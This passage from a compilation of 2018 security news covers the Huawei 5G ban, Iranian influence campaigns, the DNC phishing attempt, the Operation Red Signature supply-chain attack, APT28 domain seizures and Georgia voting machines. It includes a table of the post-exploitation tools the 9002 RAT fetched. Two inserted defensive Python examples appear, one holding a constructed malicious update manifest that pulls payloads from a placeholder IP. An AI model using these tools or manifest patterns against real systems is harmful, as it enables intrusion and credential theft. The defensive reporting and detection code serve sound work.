The email's actual sender remains a mystery — independent analyses of the malicious message by Secureworks and its competitor CrowdStrike yielded nothing definitive.

Church officials told the AP they were disturbed by the hacker's command of church jargon and their inside knowledge of Papachristou's appointment.

"The one who made this is someone who knows us," one official said.

Priests and prelates don't make obvious targets for cyberespionage, but the stakes for the Kremlin are high as the decision on Tomos looms.

Granting the Ukrainian church full independence "would be that devastating to Russia," said Daniel Payne, a researcher on the board of the J.M. Dawson Institute of Church-State Studies at Baylor University in Texas.

"Kiev is Jerusalem for the Russian Orthodox people," Payne said. "That's where the sacred relics, monasteries, churches are ... it's sacred to the people, and to Russian identity."

Australia banned Huawei from 5G network due to security concerns
25.8.18 securityaffairs BigBrothers

Chinese-owned telecommunications firm Huawei has been banned from Australia’s 5G network due to security concerns.
The Australian government considers Huawei’s involvement in the rollout of next-generation 5G communication networks too risky.

Huawei Australia called the decision disappointing. In a tweet posted on August 23, 2018, the company said:

“We have been informed by the Govt that Huawei & ZTE have been banned from providing 5G technology to Australia. This is an extremely disappointing result for consumers. Huawei is a world leader in 5G. Has safely & securely delivered wireless technology in Aust for close to 15 yrs”

The Chinese company was founded by a former People’s Liberation Army official in 1987.

The US was the first country that warned of the security risks associated with the usage of the products manufactured by the Chinese telecommunications giant.

The Chinese firm denies having shared Australian customer data with Chinese intelligence, but that is not enough for the Australian Government.

Australian authorities also banned the Chinese firm ZTE Corp.

Huawei Australia Chairman John Lord explained in June that banning one of the world’s leading 5G suppliers could impact Australia’s economic growth and productivity for generations.

The Chinese Government is concerned about the decision of the Australian Government.

“We urge the Australian government to discard ideological biases and create a level playing field for Chinese companies’ operations in Australia,” said Foreign Ministry spokesman Lu Kang.

In May, the Pentagon ordered retail outlets on US military bases to stop selling Huawei and ZTE products due to the unacceptable security risk they pose.

The Pentagon considers the security risk posed by the adoption of devices manufactured by the Chinese firms unacceptable; US officials believe the smartphones could be used to spy on military personnel.

“Huawei and ZTE devices may pose an unacceptable risk to the department’s personnel, information and mission,” said Pentagon spokesman Major Dave Eastburn.

“In light of this information, it was not prudent for the department’s exchanges to continue selling them.”

In February, Dan Coats, the Director of National Intelligence, along with several other top intelligence officials, urged Americans to avoid buying Huawei and ZTE products.

Google Blocks Accounts in 'Influence Operation' Linked to Iran
24.8.18 securityweek BigBrothers

Google said Thursday it blocked YouTube channels and other accounts over a misinformation campaign linked to Iran, on the heels of similar moves by Facebook and Twitter.

Google said that working with the cybersecurity firm FireEye, it linked the accounts to the Islamic Republic of Iran Broadcasting as part of an effort dating to at least January 2017.

"We identified and terminated a number of accounts linked to the IRIB organization that disguised their connection to this effort," Google vice president Kent Walker said in a statement.

"Actors engaged in this type of influence operation violate our policies, and we swiftly remove such content from our services and terminate these actors' accounts."

Google became the latest online service to crack down on misinformation efforts stemming from Russia and Iran, with the apparent aim of sowing discord and confusion ahead of the November US elections.

The tech giant said it blocked 39 YouTube channels that had racked up a total of 13,466 views in the US on "relevant videos" and disabled six accounts at Blogger and 13 accounts at its Google+ social network.

"In addition to the intelligence we received from FireEye, our teams have investigated a broader range of suspicious actors linked to Iran who have engaged in this effort," Google said.

Phishing season

Google also said it has blocked state-sponsored phishing attacks in which deceptive messages were sent to users of its free email service in an effort to trick people into disclosing information such as passwords.

"In recent months, we've detected and blocked attempts by state-sponsored actors in various countries to target political campaigns, journalists, activists, and academics located around the world," Google said.

The California-based internet giant added that in the past year it has intensified defenses against "actors linked to" the Russia-backed Internet Research Agency (IRA).

Google has removed YouTube channels and a Blogger account as a result of monitoring IRA activities, according to the company. A FireEye report released on Thursday detailed its findings and expressed confidence in attributing influence campaigns to Iran.

Evidence included phone numbers, website registration information, and promotion of content in sync with Iranian political interests, according to the report.

"The activity we have uncovered highlights that multiple actors continue to engage in and experiment with online, social media driven influence operations as a means of shaping political discourse," FireEye said.

"These operations extend well beyond those conducted by Russia."

Coordinated manipulation

Facebook this week revealed that it removed more than 650 pages, groups and accounts identified as "networks of accounts misleading people about what they were doing."

The accounts, some on Facebook-owned Instagram, were presented as independent news or civil society groups but were actually working in coordinated efforts, the company said.

The social network giant said some of the pages were tied to groups previously linked to Russian intelligence operations.

Separately, Twitter said it suspended 284 accounts "for engaging in coordinated manipulation," adding that "it appears many of these accounts originated from Iran."

Former Facebook security chief Alex Stamos said in a blog post Wednesday that gaping holes remain in online platforms.

Stamos, who left Facebook this month to join Stanford University, said that "the United States has broadcast to the world that it doesn't take these issues seriously...While this failure has left the US unprepared to protect the 2018 elections, there is still a chance to defend American democracy in 2020."

Microsoft last week seized websites it linked to Russian intelligence that sought to meddle in US political debate.

Australia Bans Huawei From 5G Network Over Security Concerns
24.8.18 securityweek BigBrothers

CANBERRA, Australia (AP) — Chinese-owned telecommunications giant Huawei has been blocked from rolling out Australia's 5G network due to security concerns.

The government said Thursday that the involvement of a company "likely to be subject to extrajudicial directions from a foreign government" presented too much risk.

Several governments have been scrutinizing Huawei over its links to the Chinese government. The private Chinese company started by a former People's Liberation Army major in 1987 suffered a setback in the U.S. market in 2012 when a congressional report said it was a security risk and warned phone companies not to buy its equipment.

Huawei has said it would never hand over Australian customer data to Chinese spy agencies, but the government's statement said no combination of security controls sufficiently mitigated the risk.

Acting Home Affairs Minister Scott Morrison said the government was committed to protecting 5G networks.

The decision also affects ZTE Corp, a Chinese maker of mobile devices.

Shenzhen-based Huawei, the world's largest telecommunications equipment supplier, had been banned from bidding for contracts for Australia's broadband network in 2011.

5G networks will start commercial services in Australia next year.

Huawei Australia tweeted that the decision was "extremely disappointing." Huawei Australia Chairman John Lord had said in June that rejecting one of the world's leading 5G suppliers could impact Australia's economic growth and productivity for generations.

In Beijing, Foreign Ministry spokesman Lu Kang expressed "serious concerns" about the decision and accused the Australian government of "making up excuses to create hurdles deliberately and taking discriminative measures in this regard.

"We urge the Australian government to discard ideological biases and create a level playing field for Chinese companies' operations in Australia," Lu told reporters at a daily briefing.

The U.S. House Intelligence Committee previously found that Huawei and ZTE, which is partly state-owned, were tied to the Chinese government and that both companies failed to provide responsive and detailed answers about those relationships and about their U.S. operations.

Huawei denied being financed to undertake research and development for the Chinese military, but the committee said it had received internal Huawei documents showing the company provided special network services to an entity alleged to be an elite cyber-warfare unit within the People's Liberation Army.

Lord, of Huawei Australia, at the time urged Australia not to be swayed by the U.S. report, which he said was about protectionism rather than security.

Attempt to Break Into Democratic Party Voter Data Thwarted
23.8.18 securityweek BigBrothers

An attempt to break into the Democratic National Committee’s massive voter database has been thwarted, a party official said Wednesday, two years after Russian operatives sent the party into disarray by hacking into its computers and facilitating the release of tens of thousands of emails amid the presidential election.

A web security firm using artificial intelligence uncovered the attempt. The DNC was notified Tuesday, it said. Hackers had created a fake login page to gather usernames and passwords in an effort to gain access to the Democratic Party’s voter file, a party official said. The file contains information on tens of millions of voters. The attempt was quickly thwarted by suspending the attacker’s account, and no information was compromised, the official said. The FBI was notified.

The official wasn’t authorized to speak about sensitive security information and spoke to The Associated Press on condition of anonymity.

Government and tech officials say it’s too early to know who was behind the attempt. The FBI declined to comment to the AP.

The attempt comes as Democrats gather for their summer meeting. The party’s cybersecurity has been an issue since the 2016 presidential election, when Russian hackers compromised DNC servers and publicly revealed internal communications that exploited divisions between Bernie Sanders’ and Hillary Clinton’s campaigns as the two candidates vied for the Democratic presidential nomination. Hackers also accessed the email accounts of Clinton’s campaign chairman, John Podesta, and systematically released the contents throughout the fall campaign.

It also comes a day after Microsoft announced it had uncovered similarly fraudulent websites created by Kremlin agents that spoofed two conservative outfits that are foes of Russia’s president, Vladimir Putin, presumably to trick unwitting visitors into surrendering credentials.

Bob Lord, the DNC’s chief security officer, said the attempt showed how serious the cyberthreat is and why it’s critical that state and federal officials work together on security.

“This attempt is further proof that there are constant threats as we head into midterm elections and we must remain vigilant in order to prevent future attacks,” Lord said in a statement.

He said President Donald Trump isn’t doing enough to protect American democracy. Previously, Trump mocked the DNC’s cybersecurity and cast doubt on U.S. intelligence officials’ findings that Russia was involved.

At a previously scheduled election security briefing Wednesday, Homeland Security Secretary Kirstjen Nielsen said the quick response to the attempted DNC hack showed that the system was working “and that different entities understand who to reach out to,” she said.

“Any attack on a political party or a campaign is important for us all to take seriously,” she said, emphasizing the government was doing all it could to help protect election systems ahead of the midterm elections. At stake is control of Congress, which could potentially switch from Republican to Democrat.

Amid the news, a Senate committee abruptly postponed a Wednesday vote on legislation to help states prevent against election hacking, frustrating Democrats and at least one Republican on the panel.

The vote was put off by the Senate Rules and Administration Committee after a bipartisan group of lawmakers spent months negotiating the legislation. The bill would aim to protect state election infrastructure by requiring that all states use backup paper ballots and conduct audits after elections, among other measures. It would also require DHS to immediately notify states if the federal government is aware that a state election system has been breached.

A Senate Republican aide said the vote was postponed because secretaries of state had complained about certain provisions, including the type of audits the bill would require. The aide said additional Republican support would be necessary to move the legislation out of committee. The aide was not authorized to speak about the committee’s reasoning and spoke on condition of anonymity.

Republican Sen. James Lankford of Oklahoma, one of the bill’s sponsors, said after the vote’s postponement: “Congressional inaction is unacceptable.”

The bill “will help states take necessary steps to further prepare our election infrastructure for the possibility of interference from not just Russia, but other possible adversaries like Iran or North Korea or a hacktivist group,” Lankford said.

The DNC committee attempt wasn’t mentioned at a Senate hearing on election security Wednesday, according to senators who were present.

States have been scrambling to secure their election systems since it was revealed that Russian hackers targeted election systems in at least 21 states in 2016, though the number is likely greater. There has been no indication any vote tallies were changed. Nielsen said at the briefing that states should have auditing systems in part as a safeguard so the public knows the vote tallies can be trusted.

In Tuesday’s incident, a scanning tool deployed by the San Francisco security company Lookout detected a masquerading website designed to harvest the passwords of users of the login page of NGP VAN, a technology provider used by the Democrats and other liberal-leaning political organizations, said Mike Murray, the company’s vice president of security intelligence. He said he contacted the DNC.

The tool, which leverages artificial intelligence, has been in development for a year and wasn’t tasked to scan any sites in particular but instead to identify phishing sites based on typical attributes, Murray said.

“This is the beauty of AI: It finds things that humans don’t know to look for,” he said.

He said the tool notified Lookout before the impostor page had even been populated with content. “As soon as we realized how fast it was developing, I decided to reach out to contacts that I know at the DNC.” Murray also contacted the website hosting company, Digital Ocean.

Ross Rustici, senior director for intelligence services at Cybereason in Boston, said a voter database is a juicy target for anyone trying to exacerbate political divisions in the U.S. or gain insight on political opponents.

“The data housed in these types of databases would be incredibly useful both for domestic opposition research as well as for foreign intelligence and counterintelligence purposes,” he said.

Operation Red Signature – South Korean Firms victims of a supply chain attack
23.8.18 securityaffairs BigBrothers

Supply Chain Attack Hits South Korean Firms
Security researchers from Trend Micro have uncovered a supply chain attack, tracked as Operation Red Signature, against organizations in South Korea.
The Operation Red Signature aimed at delivering a remote access Trojan (RAT) used by attackers to steal sensitive information from the victims.

Threat actors compromised the update server of a remote support solutions provider; using this attack scheme, the hackers infected the victims with the 9002 RAT backdoor.

“Together with our colleagues at IssueMakersLab, we uncovered Operation Red Signature, an information theft-driven supply chain attack targeting organizations in South Korea. We discovered the attacks around the end of July, while the media reported the attack in South Korea on August 6.” reads the analysis published by TrendMicro.

The malicious code delivered by the attackers was signed with a valid, stolen digital certificate; the attackers also changed the configuration of the update server to deliver the malware only to organizations within a specified range of IP addresses.

According to Trend Micro, the attackers likely stole the code signing certificate in April and used it to sign the malicious update files, then uploaded them to their servers.

Then the hackers compromised the server used to deliver the update and configured it to retrieve an update.zip file from the server controlled by the attackers.

Researchers observed that the 9002 RAT was also used to deliver additional payloads, such as an exploit tool for Internet Information Services (IIS) 6 WebDav (exploiting CVE-2017-7269) and an SQL database password dumper.

Hackers used the tools to steal data stored in the target’s web server and database.

“The update.zip file contains an update.ini file, which has the malicious update configuration that specifies the remote support solution program to download file000.zip and file001.zip and extract them as rcview40u.dll and rcview.log to the installation folder.” continues the analysis.

“The program will then execute rcview40u.dll, signed with the stolen certificate, with Microsoft register server (regsvr32.exe). This dynamic-link library (DLL) is responsible for decrypting the encrypted rcview.log file and executing it in memory. 9002 RAT is the decrypted rcview.log payload, which connects to the command-and-control (C&C) server at 66[.]42[.]37[.]101.”
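The update flow described above was abused at three points: the update server was reconfigured to fetch from an attacker-controlled host, the delivered DLL carried a valid but stolen signature, and a file named like a log was really an encrypted payload. The following added illustration shows the client-side checks an update agent can apply against that pattern; it is not the vendor's or Trend Micro's code, and the update.ini layout, vendor host name, certificate thumbprint and file contents are all constructed.

```python
"""Client-side policy checks for a remote-support update manifest (update.ini style).

Added illustration, not the vendor's or Trend Micro's code. Host name, thumbprint,
manifest layout and file bytes are constructed. "The signature is valid" is not
enough when the signing certificate was stolen, so the agent pins the download
host, the signing-certificate thumbprint and the SHA-256 of every file it extracts.
"""
import configparser
import hashlib
from urllib.parse import urlparse

EXECUTABLE_EXT = (".dll", ".exe", ".sys", ".ocx")

# Constructed "known good" DLL bytes standing in for the vendor's real build.
GOOD_DLL = b"MZ\x90\x00constructed-good-build-of-agent_core.dll"

# Policy shipped inside the agent (assumed values).
POLICY = {
    "update_host": "updates.example-vendor.test",
    "signer_sha256": "aa" * 32,          # pinned signing-certificate thumbprint
    "files": {                            # every file the agent may ever extract
        "agent_core.dll": hashlib.sha256(GOOD_DLL).hexdigest(),
    },
}


def validate_update(ini_text, files, policy=POLICY):
    """Return a list of (section, reason) violations; empty means apply the update.

    `files` maps each extract_as name to {"data": bytes, "signer_sha256": str|None},
    the downloaded contents plus the thumbprint reported by a separate Authenticode
    verification step that is assumed to run before this check.
    """
    cfg = configparser.ConfigParser()
    cfg.read_string(ini_text)
    violations = []
    for section in cfg.sections():
        if section == "update":
            continue
        url = cfg.get(section, "url", fallback="")
        name = cfg.get(section, "extract_as", fallback="")
        parsed = urlparse(url)
        # 1. Downloads must come from the pinned vendor host over TLS.
        if parsed.scheme != "https" or parsed.hostname != policy["update_host"]:
            violations.append((section, f"untrusted download location {url!r}"))
        # 2. Only pre-declared file names may be written to the install folder.
        pinned = policy["files"].get(name)
        if pinned is None:
            violations.append((section, f"unexpected file {name!r} in manifest"))
            continue
        blob = files.get(name)
        if blob is None:
            violations.append((section, f"{name!r} missing from download"))
            continue
        # 3. Content hash must match the pin, whatever the signature says.
        if hashlib.sha256(blob["data"]).hexdigest() != pinned:
            violations.append((section, f"hash mismatch for {name!r}"))
        # 4. Executable code must be signed by the pinned certificate, not merely
        #    by "a valid certificate" (a stolen one passes that weaker test).
        if name.lower().endswith(EXECUTABLE_EXT) and blob.get("signer_sha256") != policy["signer_sha256"]:
            violations.append((section, f"{name!r} not signed by pinned certificate"))
    return violations


# Constructed manifests; BAD_INI mirrors the malicious update described above.
GOOD_INI = """
[update]
version = 4.0.1
[file000]
url = https://updates.example-vendor.test/4.0.1/file000.zip
extract_as = agent_core.dll
"""

BAD_INI = """
[update]
version = 4.0.2
[file000]
url = http://203.0.113.10/update/file000.zip
extract_as = rcview40u.dll
[file001]
url = http://203.0.113.10/update/file001.zip
extract_as = rcview.log
"""

GOOD_FILES = {"agent_core.dll": {"data": GOOD_DLL, "signer_sha256": "aa" * 32}}
BAD_FILES = {
    "rcview40u.dll": {"data": b"MZ\x90\x00trojanized", "signer_sha256": "bb" * 32},
    "rcview.log": {"data": b"\x13\x37encrypted-payload", "signer_sha256": None},
}
# Legitimate manifest and name, but a rebuilt DLL signed with another certificate.
TROJAN_FILES = {"agent_core.dll": {"data": b"MZ\x90\x00trojanized", "signer_sha256": "bb" * 32}}

if __name__ == "__main__":
    print("good:", validate_update(GOOD_INI, GOOD_FILES))
    for section, reason in validate_update(BAD_INI, BAD_FILES) + validate_update(GOOD_INI, TROJAN_FILES):
        print(f"bad: [{section}] {reason}")
```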

Analysis of the 9002 RAT backdoor revealed it was compiled on July 17, 2018, and the configuration files inside update.zip were created on July 18. On July 18, the remote support program’s update process started. Experts also noticed that the 9002 RAT used in the supply chain attack was set to be inactive in August.

The RAT can fetch a long list of hacking tools; here is the list of files that 9002 RAT retrieves and delivers to the affected system:

Filename      | Tool                                              | Purpose
dsget.exe     | DsGet                                             | View Active Directory objects
dsquery.exe   | DsQuery                                           | Search for Active Directory objects
sharphound.exe| SharpHound                                        | Collect Active Directory information
aio.exe       | All In One (AIO)                                  | Publicly available hack tool
ssms.exe      | SQL Password dumper                               | Dump password from SQL database
printdat.dll  | RAT (PlugX variant)                               | Remote access tool
w.exe         | IIS 6 WebDav Exploit Tool                         | Exploit tool for CVE-2017-7269 (IIS 6)
Web.exe       | WebBrowserPassView                                | Recover password stored by browser
smb.exe       | Scanner                                           | Scans the system’s Windows version and computer name
m.exe         | Custom Mimikatz (including 32bit / 64bit file)    | Verify computer password and Active Directory credentials

“Supply chain attacks don’t just affect users and businesses — they exploit the trust between vendors and its clients or customers. By trojanizing software/applications or manipulating the infrastructures or platforms that run them, supply chain attacks affect the integrity and security of the goods and services that organizations provide,” Trend Micro concludes.

Iran-Linked Influence Campaign Targets US, Others
22.8.18 securityweek BigBrothers

Threat actors apparently working out of Iran have been conducting an operation whose goal is to influence the opinions of people in the United States and other countries around the world, FireEye reported on Tuesday.

This campaign, which the cybersecurity firm describes as an “influence operation,” involves a network of “inauthentic” news websites and clusters of social media accounts whose apparent purpose is to “promote political narratives in line with Iranian interests.”

The sites that FireEye calls “inauthentic” make an effort to hide their origins and affiliations, and rely on fake social media personas to promote content. This content is either original, copied from other sources, or taken from other sources and modified.

The campaign, which has been active since at least 2017, focuses on anti-Israel, anti-Saudi, and pro-Palestine topics. The threat actor behind the operation has also distributed stories regarding U.S. policies that are favorable to Iran, including the Joint Comprehensive Plan of Action nuclear deal.

In addition to the United States, the group’s targets include the United Kingdom, Latin America and the Middle East.

FireEye researchers have found several pieces of evidence suggesting that Iran is behind the operation. This includes domains registered with email addresses associated with Iranian organizations, Twitter accounts registered with phone numbers with Iran’s +98 country code, and online personas promoting Iranian holidays.

However, the company says it’s only “moderately confident” that Iran is behind the activity, mainly because influence operations are by nature designed to be deceptive.

The cybersecurity firm noted that the Iran-linked threat actor tracked as APT35, NewsBeef, Newscaster and Charming Kitten has also leveraged these types of inauthentic news sites and social media personas in its cyber espionage operations, but there is no evidence that this influence campaign has been conducted by APT35.

“The activity we have uncovered is significant and demonstrates that actors beyond Russia continue to engage in online, social media-driven influence operations as a means of shaping political discourse,” said Lee Foster, Manager of Information Operations Analysis at FireEye. “It also illustrates how the threat posed by such influence operations continues to evolve, and how similar influence tactics can be deployed irrespective of the particular political or ideological goals being pursued.”

FireEye is preparing a report containing technical details on the operation. The report will be shared on request.

Microsoft Disrupts Election-Related Domains Used by Russian Hackers
22.8.18 securityweek BigBrothers

Microsoft on Monday announced that it took control of several domains associated with a notorious Russia-linked threat actor. The names of the domains suggest the hackers may have been using them in campaigns related to the upcoming midterm elections in the United States.

The tech giant’s Digital Crimes Unit obtained a court order to take control of six domains created by a threat group tracked as APT28, Fancy Bear, Pawn Storm, Strontium, Sednit, Tsar Team and Sofacy.

APT28, which experts believe is sponsored by Russia’s GRU intelligence agency, has been known to launch politics-focused campaigns, including ones aimed at the latest presidential elections in the United States and France. The group may now be targeting the upcoming midterm elections in the U.S.

The domains seized by Microsoft are my-iri.org, hudsonorg-my-sharepoint.com, senate.group, adfs-senate.services, adfs-senate.email and office365-onedrive.com.

The first domain appears to mimic the International Republican Institute, a non-profit that receives funding from the U.S. government to promote democracy around the world. The second domain appears to impersonate the Hudson Institute, a politically conservative non-profit think tank. The other domains mimic the website of the U.S. Senate and Microsoft’s Office 365 service.
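As an added example (not Microsoft’s or SecurityWeek’s code), the check below flags registrations that borrow the names of the organizations and sign-in services these six domains mimic, and runs it over a DNS query log; the allowlist of legitimate domains, the brand keywords and the log lines are assumptions constructed for the example.

```python
"""Flag domains that impersonate protected organisations or sign-in services.

Added example, not code from Microsoft or SecurityWeek. The six suspicious
domains in the sample log are the ones named in the article; the allowlist
of legitimate domains and the brand keywords are assumptions for the example.
"""
from __future__ import annotations

import re

# Domains the protected organisations and services really use (assumed).
LEGITIMATE = {
    "senate.gov", "iri.org", "hudson.org",
    "microsoft.com", "office.com", "sharepoint.com", "onedrive.com",
}

# Brand tokens whose appearance in an unrelated registration is suspicious.
# Short tokens must equal a whole label piece; tokens of six or more
# characters also match as a prefix (so "hudsonorg" still hits "hudson").
BRAND_TOKENS = {
    "senate": "U.S. Senate",
    "iri": "International Republican Institute",
    "hudson": "Hudson Institute",
    "office365": "Microsoft Office 365",
    "sharepoint": "Microsoft SharePoint",
    "onedrive": "Microsoft OneDrive",
    "adfs": "Microsoft ADFS sign-in",
}


def label_pieces(domain: str) -> list[str]:
    """Split 'adfs-senate.services' into ['adfs', 'senate', 'services']."""
    return [p for p in re.split(r"[.\-_]", domain.lower()) if p]


def impersonation_targets(domain: str) -> list[str]:
    """Return the organisations a domain appears to impersonate (empty if none).

    A legitimate domain, or any host beneath one, is never reported; note that
    'hudsonorg-my-sharepoint.com' is not beneath 'sharepoint.com'.
    """
    domain = domain.lower().rstrip(".")
    if any(domain == legit or domain.endswith("." + legit) for legit in LEGITIMATE):
        return []
    hits = []
    for piece in label_pieces(domain):
        for token, org in BRAND_TOKENS.items():
            matched = piece == token or (len(token) >= 6 and piece.startswith(token))
            if matched and org not in hits:
                hits.append(org)
    return hits


# Constructed DNS query log: "<client> <queried name>", one query per line.
# The six suspicious names are those Microsoft seized; the rest are benign.
SAMPLE_DNS_LOG = """\
10.0.0.12 my-iri.org
10.0.0.12 www.senate.gov
10.0.0.21 hudsonorg-my-sharepoint.com
10.0.0.21 contoso.sharepoint.com
10.0.0.33 senate.group
10.0.0.33 adfs-senate.services
10.0.0.33 adfs-senate.email
10.0.0.41 office365-onedrive.com
10.0.0.41 login.microsoftonline.com
"""


def scan_dns_log(log: str) -> dict[str, list[str]]:
    """Map each queried name that looks like an impersonation to its targets."""
    findings = {}
    for line in log.splitlines():
        client, name = line.split()
        hits = impersonation_targets(name)
        if hits:
            findings[name] = hits
    return findings


if __name__ == "__main__":
    for name, orgs in scan_dns_log(SAMPLE_DNS_LOG).items():
        print(f"{name}: impersonates {', '.join(orgs)}")
```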

While the domains may have been set up for election-related campaigns, Microsoft says it currently has no evidence that any of them were successfully used in attacks, and it’s unclear exactly whom the hackers intended to target using these domains.

The company revealed last month that it had spotted some Microsoft phishing domains that had apparently been set up as part of attacks aimed at the campaigns of three congressional candidates who are running in the upcoming midterm elections.

“Microsoft has notified both nonprofit organizations. Both have responded quickly, and Microsoft will continue to work closely with them and other targeted organizations on countering cybersecurity threats to their systems. We’ve also been monitoring and addressing domain activity with Senate IT staff the past several months, following prior attacks we detected on the staffs of two current senators,” Brad Smith, Microsoft’s president and chief legal officer, said in a blog post.

This is not the first time Microsoft has seized domains used by APT28. The company says it has used court orders a total of 12 times over the past two years to shut down 84 fake websites linked to the threat group.

Sean Sullivan, Security Advisor at F-Secure, cautioned that the domains targeted by Microsoft may not necessarily be related to elections.

“Microsoft’s announcement is generating a lot of attention and the focus is overwhelmingly centered on the 2018 mid-term elections. But it’s important not to lose sight of the bigger issue,” Sullivan told SecurityWeek. “The focus on think tanks holding pro-sanction views on Russia’s current regime is about espionage. In short: spies are going to spy. That’s true whether or not it’s an election year. There seems to be a rush to conclude that these six domains are part of an “attack” on the elections that risks missing the complete threat model – and therefore the complete countermeasures that should be taken.”

Microsoft took this opportunity to announce its new AccountGuard initiative, which provides free cybersecurity protection to candidates, campaigns and political institutions using Office 365.

The AccountGuard service, which is part of Microsoft’s Defending Democracy Program, involves notifications about threats, security guidance and education, and the opportunity to test preview releases of new security features.

AccountGuard is currently available only in the United States, but Microsoft plans on offering it in other countries as well in the coming months.

Hacking Elections: Georgia's Midterm Electronic Voting in the Dock
22.8.18 securityweek BigBrothers

The security of electronic voting and the direct-recording election (DRE) voting machines used has been questioned for years. The upcoming U.S. midterm elections in November, coupled with the attempted Russian meddling in the 2016 presidential election, have made this a current and major concern for many in the security industry and beyond. Now it has gone to court.

Earlier this month (Aug. 3), the Coalition for Good Governance filed a Motion for Preliminary Injunction against the Secretary of State for Georgia (Brian Kemp, who is also the Republican candidate for governor in the midterms) seeking to force the state to abandon DREs and revert to a paper ballot.

The Secretary of State has responded to the Motion, claiming, “Such recklessness, if given the power of a federal decree, would compromise the public interest.”

Security concerns

Concern over the security of electronic voting was heightened following the 2016 presidential election. The incumbent Obama administration accused Russia of interfering and being behind a breach of the DNC and subsequent leak of sensitive data.

For the most part it is believed that Russia attempted to influence rather than control the vote. However, an NSA document acquired and discussed by The Intercept in June 2017 “raises the possibility that Russian hacking may have breached at least some elements of the voting system, with disconcertingly uncertain results.”

There is no claim that Russia affected the outcome of the election. The primary concern is that nobody knows the extent of what was done, nor what could have been done – and, more disconcertingly, what might be done next time.

The vulnerability of the DRE systems themselves is hardly doubted. At the end of 2016, both Cylance and Symantec separately demonstrated hacks against DREs. This month DEF CON ran its second annual Vote Hacking Village, where attendees were invited to hack the voting infrastructure, including DREs – and numerous vulnerabilities were found and exploited.

DRE manufacturers, and officials using them, are quick to point out most exploits require physical access to the machines, and that any individual hack would only affect the votes made on that system. The overall vote itself will remain statistically valid.

Last week (Aug. 13), a new survey from Venafi found that 93% of more than 400 IT security professionals from the U.S., UK and Australia “are concerned about cyber-attacks targeting election infrastructure and data.” Furthermore, “81% believe cyber criminals will target election data as it is transmitted between machines, software and hardware applications, and moved from local polling stations to central aggregation points.”

The voting infrastructure is much wider than vulnerable DREs alone.

Court case in Georgia

The Coalition for Good Governance is attempting to gain a court order to force Georgia to abandon electronic voting and go back to a paper-based ballot because it does not believe a full and fair vote can be guaranteed. It has asked for a Preliminary Injunction.

Georgia stands out from the majority of states. Although it is not one of the perennial swing states, these midterms are likely to be different, and relatively few votes could swing the result one way or the other.

Georgia uses approximately 27,000 Diebold AccuVote DRE touchscreen voting units running a modified version of Windows CE. These units do not and cannot produce a paper audit trail of votes. Georgia is one of just a few states – and the largest – that does not produce a paper backup.

The Coalition’s argument hinges on three elements: that DREs are inherently insecure; that Georgia’s voting system has already been breached; and that Georgia voting officials destroyed all evidence of who might have benefited from the breach.

The breach was discovered by security researcher Logan Lamb. The court document states, “In late August 2016, cybersecurity researcher Logan Lamb accessed files hosted on the elections.kennesaw.edu server on the public internet, including the voter histories and personal information of all Georgia voters, tabulation and memory card programming databases for past and future elections, instructions and passwords for voting equipment administration, and executable programs controlling essential election resources.”

This database, including registration details for 6.7 million Georgia voters, was unprotected and could be accessed by anybody with an internet connection.

Richard DeMillo, director of Georgia Tech's Center for 21st Century Universities, told SecurityWeek, “If I were a hacker trying to affect an election in this state, that's where I would start. Because once you have access to those databases, you can, for example, on election day send people to the wrong polling stations. I actually think that this is a line of attack that people haven't looked at which has to do with simply changing contact information for voters.”

DeMillo is a professor at Georgia Tech, has worked in cybersecurity for more than 40 years, and, he says, is “a longtime observer of election security in the state of Georgia.” He is not an official advisor to the Coalition, but as an employee of a public university is available to offer advice to anyone who seeks it.

The concern for the Coalition is that firstly, Georgia did little to secure the database – it remained online and available to everyone for at least six months before it was removed; secondly, that Georgia did not undertake a forensic examination to determine whether the database had been altered or manipulated; and thirdly, three days after the Coalition’s lawsuit was filed, election officials “destroyed all data on the hard drives of the KSU elections.kennesaw.edu server.”

There is consequently now no way of knowing who may have accessed that database nor whether any unauthorized changes were made to it.

Marilyn R. Marks, VP and executive director of the Coalition for Good Governance, described another potential attack against the Georgia midterms that would be relatively easy if the pollbooks stored at KSU had been downloaded or amended by attackers.

“One of [DeMillo’s] colleagues went to vote, and he was issued the wrong ballot (his affidavit is in the Exhibits of the Motion),” Marks told SecurityWeek. “Name is Kadel. He was given the wrong electronic ballot. If you look at his voter registration record, name address, everything's just fine. We do not know what happened.” His ballot paper seemed to be in order, but was for Congressional District 5 instead of Congressional District 6. Had he not noticed this discrepancy his vote would have been nullified.

“But here's another theoretical attack,” continued Marks. “You can leave all that stuff there. But change the ballot combination code that's in the electronic pollbook and the voter gets issued the wrong ballot. Nobody knows what their ballot combination is. It's not given out to voters.”

Rob Kadel is assistant director for research in education innovation, Center for 21st Century Universities at Georgia Tech.

The Secretary of State’s response to the Coalition’s motion is to concentrate on the physical problems of changing to paper at this stage. The response does not attempt to prove that DRE machines are secure, but states that the Coalition has not proven them to be insecure. It describes the motion as ‘Plaintiff’s paranoia’, and says, “Luddite prejudices against software technology are insufficient justification to override a statutory regime promulgated by duly-elected legislators, sustained against prior constitutional challenges, and overseen by state officials acting pursuant to their respective duties within that legislative framework.”

Both sides vehemently disagree. The Coalition was set to file its own reply to Kemp’s response on Monday (SecurityWeek will post the URLs to this and to Secretary Kemp’s initial response as soon as they become available). The reply is likely to assert that a switch to paper is feasible within the time constraints.

Industry views on the midterms in Georgia

The outcome of the Motion for Preliminary Injunction will be decided by the court, and probably very quickly. In the meantime, SecurityWeek talked to several security experts for their view on the current situation.

“The key to any voting system is the integrity of the data, and given the proven attacks against the DRE systems, this can no longer be guaranteed,” commented Joseph Kucic, CSO at Cavirin. “Without evidence of having the appropriate controls there is a good chance that the plaintiffs could win their case. With regard to the actual motion, any difficulties with paper ballot deployment – and there should not be many – are more than made up for by the potential risks of a compromised system.”

Not everyone agrees. Sanjay Kalra, co-founder and chief product officer at Lacework, told SecurityWeek, “Moving backwards to paper-based systems is not only inefficient, it’s also not materially any more secure. Hackers want to disrupt and steal, which they will do aggressively, irrespective of medium or platform. For those running digital election systems, the vision should be to use a best practices approach along with tools that support awareness and remediation to provide the best protection against bad actors. Those responsible for data protection must always seek to balance efficiency, user experience and security.”

“There’s a compelling case to be made on both sides,” says Abhishek Iyer, technical marketing manager at Demisto. Reverting to paper is supported by the general lack of confidence in the security of DREs and the known voter data leaks. “However,” he adds, “with impending midterm elections, there’s not enough time to execute an end-to-end change and go back to paper-based voting; improper transition could result in voter confusion, error, and inadvertent suppression (since electronic systems are also used to verify voter registration).”

